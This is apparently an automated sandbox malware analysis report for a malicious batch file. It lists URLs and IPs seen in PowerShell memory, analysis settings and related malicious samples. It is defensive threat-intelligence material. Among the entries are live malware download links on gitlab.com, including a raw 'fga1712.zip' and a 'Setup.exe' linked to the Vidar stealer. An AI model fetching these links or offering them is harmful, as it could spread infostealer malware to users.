                                                            https://app.hellosign.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.hellosign.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.dropbox.com/page_success/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://gitlab.compowershell.exe, 0000000E.00000002.1584428217.000002C500C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501620000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zippowershell.exe, 0000000E.00000002.1662213672.000002C5700E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://photos.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://a.sprig.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.docsend.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://gitlab.com/assets/powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contoso.com/powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1525054616.0000020CEE22E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1525054616.0000020CEE371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDFBAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C5101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C5019CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C51006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A31367F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF82E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://apis.google.compowershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://officeapps-df.live.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1496759900.0000020CDE1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A311CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://login.yahoo.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://docsend.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.recaptcha.net/powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://gitlab.com(powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1525054616.0000020CEE22E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1525054616.0000020CEE371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDFBAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C5101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C5019CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C51006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A31367F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.dropbox.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF7E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF340000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://microsoft.copowershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://go.micropowershell.exe, 0000000C.00000002.1496759900.0000020CDF340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A312E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://contoso.com/Iconpowershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://help.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://canny.io/sdk.jspowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://gitlab.com/-/sandbox/powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://gitlab.com/admin/powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://customers.gitlab.compowershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.google.com/recaptcha/powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://sourcegraph.compowershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF82E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1496759900.0000020CDE1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A311CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://dl-web.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://app.hellofax.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://cfl.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.paypal.com/sdk/jspowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://docs.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high

                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                    172.65.251.78
                                                                                                                                                                                                    		gitlab.comUnited States
                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    162.125.69.18
                                                                                                                                                                                                    		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                    		19679DROPBOXUSfalse

                                                                                                                                                                                                    General Information

                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                    Analysis ID:1578278
                                                                                                                                                                                                    Start date and time:2024-12-19 14:19:17 +01:00
                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 5m 29s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                    Number of analysed new started processes analysed:21
                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Sample name:fghdsdf17.bat
                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal88.troj.evad.winBAT@30/16@3/2
                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                    • Number of executed functions: 14
                                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Found application associated with file extension: .bat

                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 3324 because it is empty
                                                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 4808 because it is empty
                                                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5512 because it is empty
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • VT rate limit hit for: fghdsdf17.bat

                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    08:20:18API Interceptor67x Sleep call for process: powershell.exe modified

                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                    IPs

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                                                    162.125.69.18hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                      jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                          hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                            hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                  CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                    xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                      RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        gitlab.comhnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
